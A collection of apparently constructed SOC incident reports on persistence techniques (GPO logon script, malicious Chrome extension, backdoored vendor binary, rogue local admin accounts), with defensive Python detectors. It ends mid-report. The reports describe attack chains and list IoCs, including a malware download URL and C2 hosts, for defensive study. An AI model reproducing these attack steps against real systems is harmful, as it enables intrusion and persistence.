**Ticket:** SOC-2024-080
**Summary:** T1037 – Malicious Logon Script Added to Default Domain Policy
**Status:** RESOLVED
**Resolution:** MALICIOUS – Widespread Execution Contained
**Priority:** P1 – CRITICAL
**Labels:** T1037, logon-scripts, gpo, mdi, domain-compromise
**Components:** Identity-Management, Group-Policy, Incident-Response
---
**INCIDENT ANALYSIS REPORT**
**1. Initial Context:**
* **Detection Source:** Microsoft Defender for Identity.
* **Alert:** “Suspicious Group Policy Object Modification”.
* **GPO:** Default Domain Policy.
* **Modification:** Logon script added for all domain users.
* **Time:** 2024-02-15 08:30 EST.
* **Technique:** MITRE ATT&CK T1037.001 – Boot or Logon Initialization Scripts: Logon Script.
**2. Technical Analysis:**
* **Attack Chain:**
```
07:45 – kjohnson’s credentials compromised via phishing
07:50 – Attacker logs into DC-01 from 45.134.225[.]78
08:00 – Attacker opens Group Policy Management Console
08:05 – Modifies Default Domain Policy
08:10 – Adds healthcheck.vbs as logon script
08:15 – GPO replicates to all domain controllers
08:16-08:30 – 347 users log on and execute script
08:30 – MDI alerts
```
* **Malicious Script:**
  - **File:** healthcheck.vbs
  - **Location:** \\company.com\SYSVOL\company.com\scripts\
  - **Function:** Runs hidden PowerShell to download update.ps1 from 185.143.221[.]89
  - **update.ps1:** Later analysis shows it's a Cobalt Strike downloader
* **Scope:**
  - 3,200+ domain users targeted
  - 347 users executed script before removal
  - 12 users had successful C2 connections (firewall logs)
  - No data exfiltration detected
* **Compromised Admin Account:**
  - User: kjohnson (Domain Admin)
  - Compromise method: Phishing (fake Office 365 login)
  - No MFA (now enforced)
**3. Investigation Findings:**
* **Timeline:**
```
07:45 – Credentials compromised
07:50 – Attacker logs into DC-01
08:00-08:15 – GPO modified
08:16-08:30 – Users log on, execute script
08:30 – Alert triggers
08:32 – SOC investigates
08:35 – GPO reverted
08:40 – Script deleted from SYSVOL
08:45 – kjohnson account disabled
```
* **Affected Users:**
  - 347 users executed script
  - 12 had successful C2 connections
  - All affected users contacted; passwords reset
* **Indicators of Compromise (IoCs):**
```
GPO:
– Default Domain Policy modified
– Logon script: healthcheck.vbs
Files:
– \\company.com\SYSVOL\company.com\scripts\healthcheck.vbs (SHA256: a1b2c3…)
– update.ps1 (SHA256: b2c3d4…)
Network:
– Download URL: http://185.143.221[.]89/update.ps1
– C2: 185.143.221[.]89:443
Account:
– kjohnson (compromised)
```
**4. Containment Actions:**
* **Immediate Actions:**
  - Removed logon script from Default Domain Policy.
  - Deleted healthcheck.vbs from SYSVOL.
  - Disabled kjohnson account.
  - Blocked malicious URLs at firewall and proxy.
  - Reset krbtgt password (as precaution).
* **Affected User Remediation:**
  - All 347 users contacted.
  - Passwords reset for those with C2 connections (12 users).
  - Endpoint scans on all affected workstations.
  - No persistent malware found (scripts were downloaders only).
* **Domain Controller Hardening:**
  - Restricted access to GPMC to specific admin workstations.
  - Enabled auditing for all GPO changes.
  - Implemented change management for GPO modifications.
**5. Root Cause Analysis:**
* **Primary Cause:** Domain Admin credentials compromised via phishing.
* **Contributing Factors:**
1. No MFA on admin accounts.
2. GPO modification allowed from any workstation.
3. No change management for GPO changes.
4. Logon scripts allowed to execute from network shares.
**6. Business Impact:**
* **Operational Impact:** 347 workstations potentially compromised; all cleaned.
* **Data Exposure:** None confirmed.
* **Productivity Impact:** 2-3 hours per affected user for password resets and scans.
* **Reputational Impact:** Internal only.
**7. Remediation & Prevention:**
**Completed Actions:**
- [x] Malicious GPO change reverted.
- [x] Compromised admin account secured.
- [x] Affected users remediated.
- [x] IOCs blocked.
**Technical Controls Enhanced:**
- [x] Enforced MFA for all admin accounts.
- [x] Implemented Privileged Access Workstations (PAWs) for admins.
- [x] Restricted GPO modification to specific admin workstations.
- [x] Enabled approval workflow for GPO changes.
- [x] Blocked PowerShell downloads from external URLs via GPO.
- [x] Enhanced monitoring for logon script modifications.
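Group Policy records a GPO's logon-script assignments in its `scripts.ini` (`[Logon]`/`[Logoff]` sections with `NCmdLine=` and `NParameters=` pairs). The following Python is an added example, not code from this report or from Microsoft: it parses that file and reports every `[Logon]` entry that is not on an approved list, which is one way to implement the logon-script monitoring listed above. The approved list and the sample file are constructed; real `scripts.ini` files are usually UTF-16 with a BOM, so decode them before passing the text in.

```python
"""Audit the logon-script assignments of a GPO against an approved baseline.

Added example, not code from the incident report or from Microsoft. Group Policy
stores per-GPO script assignments in scripts.ini (real format: [Logon] and
[Logoff] sections holding NCmdLine= / NParameters= pairs, N = 0, 1, ...). The
approved list and the sample file below are constructed for this example.
"""
import re
from typing import Dict, List

# Constructed baseline: the only logon scripts change management has approved.
APPROVED_LOGON_SCRIPTS = {r"\\company.com\netlogon\mapdrives.bat"}

ENTRY_RE = re.compile(r"^(?P<idx>\d+)(?P<key>CmdLine|Parameters)=(?P<val>.*)$")


def parse_scripts_ini(text: str) -> Dict[str, List[dict]]:
    """Return {section: [{"cmdline": ..., "parameters": ...}, ...]} in index order.

    Real scripts.ini files are usually UTF-16 with a BOM; decode before calling.
    """
    sections: Dict[str, Dict[str, dict]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        m = ENTRY_RE.match(line)
        if m and current is not None:
            entry = sections[current].setdefault(
                m["idx"], {"cmdline": "", "parameters": ""})
            entry[m["key"].lower()] = m["val"].strip()
    return {sec: [entries[k] for k in sorted(entries, key=int)]
            for sec, entries in sections.items()}


def audit_logon_scripts(text: str, approved=APPROVED_LOGON_SCRIPTS) -> List[str]:
    """One finding per [Logon] entry whose command line is not on the approved list."""
    allowed = {a.lower() for a in approved}
    findings = []
    for entry in parse_scripts_ini(text).get("Logon", []):
        cmd = entry["cmdline"]
        if cmd.lower() not in allowed:
            findings.append(f"unapproved logon script: {cmd} {entry['parameters']}".rstrip())
    return findings


# Constructed sample resembling the modified Default Domain Policy in the report.
SAMPLE_SCRIPTS_INI = r"""
[Logon]
0CmdLine=\\company.com\netlogon\mapdrives.bat
0Parameters=
1CmdLine=\\company.com\SYSVOL\company.com\scripts\healthcheck.vbs
1Parameters=
"""

if __name__ == "__main__":
    for finding in audit_logon_scripts(SAMPLE_SCRIPTS_INI):
        print(finding)
```

Run periodically against every GPO's `User\Scripts\scripts.ini` and `Machine\Scripts\scripts.ini` under SYSVOL; a finding means a script was assigned outside change management, which is exactly the change MDI alerted on here.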
**8. Conclusion:**
An attacker compromised a Domain Admin and added a malicious logon script to the Default Domain Policy, affecting all domain users. 347 users executed the script before detection. MDI detected the anomalous GPO change within 15 minutes, enabling rapid containment. All affected systems were cleaned, and enhanced controls now prevent similar attacks.
**Closure Rationale:** GPO reverted; admin account secured; affected users remediated; controls enhanced.
**Analyst:** [Walter White], SOC Analyst
**Date:** 2024-02-15 11:00 EST
---
Batch 9: Persistence & Privilege Escalation Incident Reports
41. T1176 – Browser Extensions (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-BROWSER-EXT-1176-7842
Alert Time: 2024-02-16 09:30:15 EST
Severity: MEDIUM (72/100)
Source: Microsoft Defender for Endpoint
Rule: “Suspicious Browser Extension Installed”
MITRE ATT&CK: T1176 – Browser Extensions
Alert Details:
Detection: Unauthorized browser extension installed with broad permissions
Host: SLS-WS-045 (Sales Department)
User: mwilson (Mike Wilson, Sales Rep)
Browser: Google Chrome
Time: 09:25 EST
Extension Details:
– Name: “Google Docs Offline Helper”
– ID: gdoc-offline-helper-12345
– Source: Chrome Web Store (external)
– Install Time: 09:24:30 EST
– Permissions Requested:
– Read and change all data on websites
– Access browsing history
– Manage downloads
– Communicate with cooperating native applications
Installation Source:
– User clicked pop-up on news-site during browsing
– Pop-up claimed “Chrome update required”
– Extension downloaded and installed automatically
Behavior Analysis:
– Extension has since:
– Exfiltrated browsing history to 185.143.221[.]89:8080
– Injected ads into search results
– Captured keystrokes on banking sites
– Downloaded additional JavaScript payloads
Threat Intelligence:
– Extension matches known “AdsExhaust” ad fraud campaign
– Used to steal credentials and browsing data
– Similar extensions installed on 3 other hosts
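The permission set requested above (all-site access, history, downloads, native messaging) is what made this extension dangerous. As an added example, not part of the alert and not code from Google or the SOC, the Python below triages extensions from the permissions declared in their `manifest.json` and marks that combination for review unless the extension ID is on an allowlist. The manifest keys are real Chrome manifest fields; the allowlist, the IDs and the sample manifests are constructed.

```python
"""Triage installed Chrome extensions from their manifest.json permissions.

Added example, not code from the report or from Google. The manifest keys used
("permissions", "host_permissions", "<all_urls>", "history", "downloads",
"nativeMessaging", ...) are real Chrome manifest fields; the allowlist, the
extension IDs and the sample manifests are constructed.
"""
import json
from typing import Dict, List

# Constructed allowlist: the IDs an organisation would also publish through
# the ExtensionInstallAllowlist policy.
APPROVED_IDS = {"approved-password-manager-00001"}

# Permissions that, combined, give the capabilities seen in the incident.
HIGH_RISK = {
    "history": "reads browsing history",
    "downloads": "can write files to disk",
    "nativeMessaging": "can talk to native applications",
    "webRequest": "can observe web traffic",
    "cookies": "can read session cookies",
    "scripting": "can inject scripts into pages",
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def assess_manifest(ext_id: str, manifest: Dict) -> Dict:
    """Score one extension; 'review' means a human should look before it stays."""
    perms = set(manifest.get("permissions", []))
    hosts = set(manifest.get("host_permissions", []))
    # Manifest V2 listed host patterns under "permissions" as well.
    hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}
    reasons = [HIGH_RISK[p] for p in sorted(perms) if p in HIGH_RISK]
    if hosts & BROAD_HOSTS:
        reasons.append("can read and change data on all websites")
    if ext_id in APPROVED_IDS:
        verdict = "approved"
    elif len(reasons) >= 2:
        verdict = "review"
    else:
        verdict = "low"
    return {"id": ext_id, "name": manifest.get("name", ""),
            "score": len(reasons), "verdict": verdict, "reasons": reasons}


def triage(installed: Dict[str, str]) -> List[Dict]:
    """installed maps extension ID -> manifest.json text; one result per extension."""
    return [assess_manifest(ext_id, json.loads(text)) for ext_id, text in installed.items()]


# Constructed manifests: one mirroring the extension in the report, one benign.
SAMPLE_INSTALLED = {
    "gdoc-offline-helper-12345": json.dumps({
        "manifest_version": 3,
        "name": "Google Docs Offline Helper",
        "permissions": ["history", "downloads", "nativeMessaging", "scripting"],
        "host_permissions": ["<all_urls>"],
    }),
    "approved-password-manager-00001": json.dumps({
        "manifest_version": 3,
        "name": "Corp Password Manager",
        "permissions": ["storage", "tabs"],
    }),
}

if __name__ == "__main__":
    for r in triage(SAMPLE_INSTALLED):
        print(f"{r['verdict']:8} {r['score']}  {r['name']} ({r['id']}): {', '.join(r['reasons'])}")
```

Feed it the manifests collected from each user profile's extensions folder; the allowlist is the same list of IDs that a Chrome `ExtensionInstallAllowlist` policy would enforce once the blocklist-only posture is replaced.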
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed malicious extension installation |
| 2. Extension Analysis | Extract and analyze extension code | Chrome Extension Inspector, Sandbox | Extension contains data exfiltration and keylogging code |
| 3. Network Check | Check for data exfiltration | Zscaler Logs, Firewall | History data sent to 185.143.221[.]89:8080 |
| 4. Immediate Action | Remove extension from host | Chrome Management, PowerShell | Extension uninstalled from affected host |
| 5. Enterprise-wide Check | Search for same extension on other hosts | Defender Advanced Hunting | 3 other hosts with same extension found |
| 6. User Notification | Notify affected users | Email, Teams | All users contacted; passwords reset |
Jira Incident Report
Ticket: SOC-2024-081
Summary: T1176 – Malicious Browser Extension Installed via Fake Update
Status: RESOLVED
Resolution: MALICIOUS – Extension Removed
Priority: P2 – MEDIUM
Labels: T1176, browser-extensions, chrome, defender, data-exfiltration
Components: Endpoint-Security, Browser-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Suspicious Browser Extension Installed”.
Host: SLS-WS-045 (Sales Department, user mwilson).
Time: 2024-02-16 09:30 EST.
Technique: MITRE ATT&CK T1176 – Browser Extensions.
2. Technical Analysis:
Attack Chain:
09:20 – User visits news-site.com
09:21 – Malicious pop-up appears: “Chrome update required”
09:22 – User clicks “Update Now”
09:23 – Chrome downloads extension from Chrome Web Store (legitimate store, malicious extension)
09:24 – Extension installed with broad permissions
09:25 – Defender alerts based on behavior
Extension Analysis:
Name: “Google Docs Offline Helper” (masquerading)
ID: gdoc-offline-helper-12345
Permissions: Read/write to all sites, history, downloads, native messaging
Malicious Functions:
Exfiltrates browsing history to C2 every 5 minutes
Injects ads into search results (ad fraud)
Captures keystrokes on banking sites (Bank of America, Chase, etc.)
Downloads additional JavaScript from C2
Data Exfiltrated:
Browsing history (last 7 days)
Saved passwords (from browser password manager)
Cookies (session hijacking)
Scope:
4 hosts total affected (all in Sales department)
All installed same extension
3. Investigation Findings:
Timeline:
09:20 – User visits news site
09:24 – Extension installed
09:25 – Defender alert
09:27 – SOC investigation begins
09:30 – Host isolated; extension removed
09:45 – Enterprise-wide hunt finds 3 more hosts
Indicators of Compromise (IoCs):
Extension:
– Name: “Google Docs Offline Helper”
– ID: gdoc-offline-helper-12345
Network:
– C2: 185.143.221[.]89:8080
Hosts:
– SLS-WS-045, SLS-WS-046, SLS-WS-047, SLS-WS-048
4. Containment Actions:
Immediate Actions:
Removed extension from all affected hosts via PowerShell.
Cleared browser data (history, cookies, saved passwords).
Isolated hosts temporarily for scanning.
Blocked C2 IP at firewall.
User Remediation:
All affected users forced password reset.
Users educated on fake browser updates.
Browser settings reset to default.
Enterprise-wide:
Blocked extension ID via Chrome GPO (ExtensionInstallBlocklist).
Deployed Chrome cleanup tool to all hosts.
5. Root Cause Analysis:
Primary Cause: User clicked fake browser update pop-up.
Contributing Factors:
Chrome allowed extension install without admin approval.
No extension allowlist/blocklist in place.
User unaware of fake update scams.
6. Business Impact:
Operational Impact: 4 sales workstations offline for 2 hours.
Data Exposure: Browsing history, saved passwords (all passwords reset).
Financial Impact: Potential ad fraud costs (minimal).
7. Remediation & Prevention:
Completed Actions:
Extensions removed.
Passwords reset.
C2 blocked.
Technical Controls Enhanced:
Implemented Chrome extension allowlist (only approved extensions).
Blocked all extensions from external sources via GPO.
Enabled Defender alerting for any new extension installations.
Deployed browser isolation for high-risk browsing.
8. Conclusion:
Users in the Sales department installed a malicious Chrome extension after clicking a fake update pop-up. The extension exfiltrated browsing data and captured keystrokes. Defender detected the extension based on behavior, enabling rapid removal and password resets.
Closure Rationale: Extensions removed; passwords reset; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 11:00 EST
42. T1554 – Compromise Client Software Binary (Tripwire Detection)
Tripwire Alert Details
Alert ID: TRIPWIRE-BIN-MOD-1554-7842
Alert Time: 2024-02-16 14:15:33 EST
Severity: CRITICAL (95/100)
Source: Tripwire File Integrity Monitoring
Rule: “Critical System Binary Modified – Unexpected Change”
MITRE ATT&CK: T1554 – Compromise Client Software Binary
Alert Details:
File Integrity Alert:
Host: APP-SVR-023 (Application Server)
Path: C:\Program Files\VendorApp\vendor_service.exe
Expected Hash (baseline): 7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b
Current Hash: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Modification Time: 14:10 EST
File Size: Same (2.1 MB)
Additional Details:
– File signed by “VendorApp Inc.” (valid signature)
– Signature timestamp: 14:09 EST (new)
– Process that modified file: powershell.exe (PID: 7842)
– User: SYSTEM (running as service)
Behavior Analysis:
– Original binary was replaced with backdoored version
– New binary contains same functionality + malicious code
– Malicious code connects to 185.143.221[.]89:443 on startup
– File signed with stolen or forged certificate
Threat Intelligence:
– VendorApp Inc. reported certificate theft last week
– Same backdoored binary seen in other attacks
– Affects version 3.2.1 of the software
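The check that produced this alert is a hash comparison against a stored baseline. As an added example written for this page (not Tripwire's code and not the vendor's), the Python below builds a SHA-256 baseline of a directory, then reports changed, missing and new binaries; it treats a changed hash as a finding regardless of code signature, since the binary here carried a valid signature from a stolen certificate. The vendor folder and its files are constructed in a temporary directory, so the hashes are whatever those bytes produce, not the report's IoC hashes.

```python
"""Compare a directory of binaries against a SHA-256 baseline, as a file-integrity
monitor does.

Added example, not Tripwire's code or the report's. It builds a baseline, then
reports files whose hash changed, files that vanished and files that appeared.
The vendor directory and its files are constructed in a temporary folder; the
hashes are whatever those bytes produce, not the report's IoC hashes.
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List

PATTERNS = ("*.exe", "*.dll")


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Map each matching file (relative POSIX path) to its SHA-256."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for pat in PATTERNS for p in sorted(root.rglob(pat)) if p.is_file()}


def compare(root: Path, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Diff the live tree against the baseline.

    A changed hash is a finding even when the file still carries a valid code
    signature: the report's binary was signed with a stolen certificate, so
    signature validity is not a clean bill of health.
    """
    current = build_baseline(root)
    return {
        "changed": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "missing": sorted(k for k in baseline if k not in current),
        "new": sorted(k for k in current if k not in baseline),
    }


def demo() -> Dict[str, List[str]]:
    """Replay the incident on constructed files: same path, same size, new bytes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        app = root / "VendorApp"
        app.mkdir()
        exe = app / "vendor_service.exe"
        exe.write_bytes(b"MZ original vendor binary")
        (app / "helper.dll").write_bytes(b"MZ helper library")
        baseline = build_baseline(root)
        exe.write_bytes(b"MZ backdoor vendor binary")      # same length, different content
        (app / "dropped.dll").write_bytes(b"MZ injected module")
        return compare(root, baseline)


if __name__ == "__main__":
    for kind, files in demo().items():
        print(kind, files)
```

The baseline itself must live somewhere the monitored host cannot write (the report's attacker ran as SYSTEM), and it is refreshed only through the change-management path that a legitimate vendor update would follow.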
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Tripwire alert | Tripwire Console | Confirmed binary hash mismatch |
| 2. Binary Analysis | Analyze vendor_service.exe | CrowdStrike Sandbox, Any.Run | Binary contains backdoor; connects to C2 |
| 3. Process Investigation | Identify how binary was modified | CrowdStrike, PowerShell Logs | PowerShell downloaded and replaced binary |
| 4. Immediate Containment | Stop service, isolate host | sc, CrowdStrike | Service stopped; host isolated |
| 5. Restore Binary | Replace with clean version from backup | File Restore | Original binary restored from backup |
| 6. Root Cause | Identify source of compromise | EDR, SIEM | PowerShell downloaded from malicious URL |
Jira Incident Report
Ticket: SOC-2024-082
Summary: T1554 – Vendor Binary Replaced with Backdoored Version
Status: RESOLVED
Resolution: MALICIOUS – Binary Restored
Priority: P1 – CRITICAL
Labels: T1554, compromise-binary, file-integrity, tripwire, supply-chain
Components: Endpoint-Security, Application-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Tripwire File Integrity Monitoring.
Alert: “Critical System Binary Modified – Unexpected Change”.
Host: APP-SVR-023 (Application Server).
File: C:\Program Files\VendorApp\vendor_service.exe.
Time: 2024-02-16 14:15 EST.
Technique: MITRE ATT&CK T1554 – Compromise Client Software Binary.
2. Technical Analysis:
Attack Chain:
14:00 – Attacker gains access via compromised service account
14:02 – PowerShell downloads backdoored binary from 185.143.221[.]89
14:05 – PowerShell stops vendor_service
14:07 – PowerShell replaces vendor_service.exe with backdoored version
14:09 – Backdoored binary signed with stolen certificate
14:10 – PowerShell starts vendor_service
14:10 – Backdoored binary connects to C2
14:15 – Tripwire detects hash mismatch
Binary Analysis:
Original: vendor_service.exe (SHA256: 7a8b9c0d…)
Backdoored: vendor_service.exe (SHA256: a1b2c3d4…)
Certificate: Stolen from VendorApp Inc. (used to sign malicious binary)
Malicious Code: Added function that:
Connects to C2 at 185.143.221[.]89:443
Waits for commands (download/execute files, exfiltrate data)
Runs in context of service account (SYSTEM)
Impact:
Service running as SYSTEM
C2 connection established for 5 minutes before detection
No data exfiltration observed (DLP logs clean)
3. Investigation Findings:
Timeline:
14:00 – Attacker accesses server
14:02-14:10 – Binary replaced
14:10 – Service restarted
14:10-14:15 – C2 communication
14:15 – Tripwire alert
14:16 – SOC investigates
14:18 – Service stopped; host isolated
14:20 – Original binary restored
Indicators of Compromise (IoCs):
Files:
– Backdoored vendor_service.exe (SHA256: a1b2c3d4…)
Network:
– C2: 185.143.221[.]89:443
– Download URL: http://185.143.221[.]89/update.exe
Account:
– Compromised service account (later identified)
4. Containment Actions:
Immediate Actions:
Stopped vendor_service.
Isolated host via CrowdStrike.
Restored original binary from backup.
Blocked C2 IP at firewall.
Service Account Remediation:
Identified compromised service account (svc_app).
Reset password.
Audited account activity.
Application Review:
All VendorApp binaries checked on other servers (no other compromises).
Vendor notified of stolen certificate abuse.
5. Root Cause Analysis:
Primary Cause: Compromised service account used to replace binary.
Contributing Factors:
Service account had local admin on application server.
No file integrity monitoring on application binaries (until Tripwire).
Vendor certificate theft enabled binary signing.
6. Business Impact:
Operational Impact: Application server offline for 1 hour.
Data Exposure: None (C2 contained).
Reputational Impact: Vendor relationship affected.
7. Remediation & Prevention:
Completed Actions:
Binary restored.
Service account secured.
C2 blocked.
Technical Controls Enhanced:
Removed local admin from service accounts.
Implemented application whitelisting (CrowdStrike Falcon Prevent).
Enhanced file integrity monitoring for all critical binaries.
Deployed certificate pinning for vendor binaries.
8. Conclusion:
An attacker compromised a service account and replaced a vendor binary with a backdoored version signed with a stolen certificate. Tripwire detected the binary change within 5 minutes, enabling rapid containment. The original binary was restored, and the service account secured.
Closure Rationale: Binary restored; account secured; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 15:30 EST
43. T1136 – Create Account (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-CREATE-ACCT-1136-7842
Alert Time: 2024-02-16 11:30:45 EST
Severity: HIGH (85/100)
Source: Splunk Enterprise Security
Rule: “Local User Account Created on Multiple Systems”
MITRE ATT&CK: T1136.001 – Create Account: Local Account
Alert Details:
Correlated Events:
1. Windows Event ID 4720 (User Account Created):
– Time: 11:15-11:25 EST
– Host: Multiple (12 workstations)
– Account Created: “support_user”
– Created By: SYSTEM (via script)
– Event Count: 12 occurrences
2. Windows Event ID 4724 (Password Set):
– Time: 11:16-11:26 EST
– Same hosts
– Account: support_user
– Password set (complex, known to attacker)
3. Windows Event ID 4732 (User Added to Group):
– Time: 11:17-11:27 EST
– Account: support_user added to “Administrators” group
– On all 12 hosts
Detection Logic:
– Same account name created on multiple workstations within 10 minutes
– Account added to local Administrators group
– Created by SYSTEM (scripted)
– No change management ticket for user creation
Affected Hosts:
– Sales: 5 workstations
– Marketing: 3 workstations
– Engineering: 4 workstations
Additional Context:
– Account named “support_user” (common for attackers)
– No legitimate IT project for local account creation
– Script source identified as scheduled task
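The detection logic above, as an added example that is not the Splunk correlation search itself: Python that correlates Event ID 4720 (account created) with Event ID 4732 (member added to a local group), fires when one account name is created on several hosts within a ten-minute window, and lists the hosts where that account also joined Administrators. The host threshold of three is an assumption; the event records are constructed, with a single-host helpdesk account included to show what does not fire.

```python
"""Correlate Windows security events into the "same local account created on
many hosts" alert described above.

Added example, not Splunk's correlation search or the report's. Event IDs 4720
(user account created) and 4732 (member added to a security-enabled local
group) are real; the event records below are constructed to resemble the
incident, with a benign single-host account for contrast. The host threshold
is an assumption.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

WINDOW = timedelta(minutes=10)   # the rule's correlation window
MIN_HOSTS = 3                    # hosts needed before the rule fires (assumed)


def correlate(events: List[Dict], min_hosts: int = MIN_HOSTS,
              window: timedelta = WINDOW) -> List[Dict]:
    created = defaultdict(list)   # account -> [(time, host)]
    admin_on = defaultdict(set)   # account -> hosts where it joined Administrators
    for e in events:
        ts = datetime.fromisoformat(e["time"])
        if e["event_id"] == 4720:
            created[e["account"]].append((ts, e["host"]))
        elif e["event_id"] == 4732 and e.get("group") == "Administrators":
            admin_on[e["account"]].add(e["host"])

    alerts = []
    for account, items in created.items():
        items.sort()
        # Slide a window over the creation times; fire on the first one that
        # spans enough distinct hosts.
        for i, (start, _) in enumerate(items):
            hosts = {host for ts, host in items[i:] if ts - start <= window}
            if len(hosts) >= min_hosts:
                alerts.append({
                    "account": account,
                    "window_start": start.isoformat(),
                    "hosts": sorted(hosts),
                    "admin_on": sorted(admin_on[account] & hosts),
                })
                break
    return alerts


# Constructed events (a subset of the fields a SIEM would carry).
SAMPLE_EVENTS = [
    {"event_id": 4720, "time": "2024-02-16T11:15:10", "host": "SLS-WS-001", "account": "support_user", "subject": "SYSTEM"},
    {"event_id": 4732, "time": "2024-02-16T11:17:05", "host": "SLS-WS-001", "account": "support_user", "group": "Administrators"},
    {"event_id": 4720, "time": "2024-02-16T11:16:40", "host": "MKT-WS-007", "account": "support_user", "subject": "SYSTEM"},
    {"event_id": 4732, "time": "2024-02-16T11:18:12", "host": "MKT-WS-007", "account": "support_user", "group": "Administrators"},
    {"event_id": 4720, "time": "2024-02-16T11:18:55", "host": "ENG-WS-031", "account": "support_user", "subject": "SYSTEM"},
    {"event_id": 4732, "time": "2024-02-16T11:20:30", "host": "ENG-WS-031", "account": "support_user", "group": "Administrators"},
    {"event_id": 4720, "time": "2024-02-16T11:22:01", "host": "ENG-WS-032", "account": "support_user", "subject": "SYSTEM"},
    # Benign: helpdesk creates one local account on one kiosk machine.
    {"event_id": 4720, "time": "2024-02-16T11:19:00", "host": "LOBBY-KIOSK-1", "account": "kiosk", "subject": "helpdesk01"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The "no change management ticket" condition from the rule is a lookup against the ticketing system and is left out here; in production it would be applied to each alert before paging.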
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Splunk correlation | Splunk ES | Confirmed local account creation on 12 hosts |
| 2. Account Remediation | Delete local accounts | PowerShell, Remote Management | support_user deleted from all hosts |
| 3. Script Investigation | Find source of account creation | CrowdStrike, SCCM | Scheduled task "SystemMaintenance" created accounts |
| 4. Malware Analysis | Analyze task script | CrowdStrike Sandbox | Script created local admin accounts for persistence |
| 5. Host Remediation | Scan and clean affected hosts | CrowdStrike, Defender | All 12 hosts cleaned; no other malware found |
| 6. Threat Hunting | Check for other accounts | Splunk, AD | No other unauthorized accounts found |
Jira Incident Report
Ticket: SOC-2024-083
Summary: T1136 – Local Admin Accounts Created on 12 Workstations
Status: RESOLVED
Resolution: MALICIOUS – Accounts Deleted
Priority: P2 – MEDIUM
Labels: T1136, create-account, local-account, persistence, splunk
Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security correlation.
Alert: “Local User Account Created on Multiple Systems”.
Account Created: support_user (local admin on 12 workstations).
Time: 2024-02-16 11:30 EST.
Technique: MITRE ATT&CK T1136.001 – Create Account: Local Account.
2. Technical Analysis:
Attack Chain:
11:00 – Attacker compromises one workstation via phishing
11:05 – Attacker uses compromised host to deploy scheduled task via Group Policy
11:10 – Scheduled task “SystemMaintenance” created on all domain workstations
11:15 – Task executes on 12 workstations
11:15-11:17 – Creates support_user with password
11:17-11:27 – Adds user to local Administrators group
11:30 – Splunk correlation triggers
Account Details:
Username: support_user
Password: Complex (known to attacker)
Privileges: Local Administrator on each host
Purpose: Persistence and lateral movement
Scheduled Task Analysis:
Name: SystemMaintenance
Action: PowerShell script embedded in task
Script: Created local user, added to Administrators group
Trigger: One-time execution (now disabled)
Scope:
12 workstations affected
No servers affected
No domain accounts created
3. Investigation Findings:
Timeline:
11:00 – Initial compromise (phishing)
11:05 – Attacker deploys scheduled task via GPO
11:10 – Task propagates to workstations
11:15-11:27 – Accounts created
11:30 – Alert triggers
11:32 – SOC investigates
11:35 – Accounts deleted from all hosts
Indicators of Compromise (IoCs):
Account:
– support_user (local on 12 hosts)
Scheduled Task:
– Name: SystemMaintenance
– Action: PowerShell script
Network:
– Initial compromise IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Deleted support_user from all 12 hosts via PowerShell.
Removed scheduled task “SystemMaintenance” from all hosts.
Isolated initially compromised host.
Blocked attacker IP.
Host Remediation:
Scanned all 12 hosts (no other malware).
No reimage needed.
User Remediation:
Users of affected workstations notified.
Passwords reset as precaution.
5. Root Cause Analysis:
Primary Cause: Initial workstation compromise via phishing.
Contributing Factors:
Group Policy allowed scheduled task deployment from any workstation.
No monitoring for local account creation.
Local admin rights already present on workstations.
6. Business Impact:
Operational Impact: 12 workstations offline for 2 hours.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Accounts deleted.
Scheduled task removed.
Initial host cleaned.
Technical Controls Enhanced:
Restricted GPO deployment to authorized admin workstations.
Created SIEM alert for any local account creation.
Implemented LAPS (Local Administrator Password Solution) for unique local admin passwords.
8. Conclusion:
An attacker compromised a single workstation and used Group Policy to create local admin accounts on 12 workstations for persistence. Splunk detected the anomalous account creation, enabling rapid removal before the accounts could be used.
Closure Rationale: Accounts deleted; scheduled task removed; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 12:30 EST
44. T1543 – Create or Modify System Process (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-SYSTEM-PROCESS-1543-7842
Alert Time: 2024-02-16 15:45:22 EST
Severity: HIGH (88/100)
Source: Splunk Enterprise Security
Rule: “Windows Service Created with Unusual Binary Path”
MITRE ATT&CK: T1543.003 – Create or Modify System Process: Windows Service
Alert Details:
Correlated Events:
1. Windows Event ID 7045 (Service Installed):
– Time: 15:40 EST
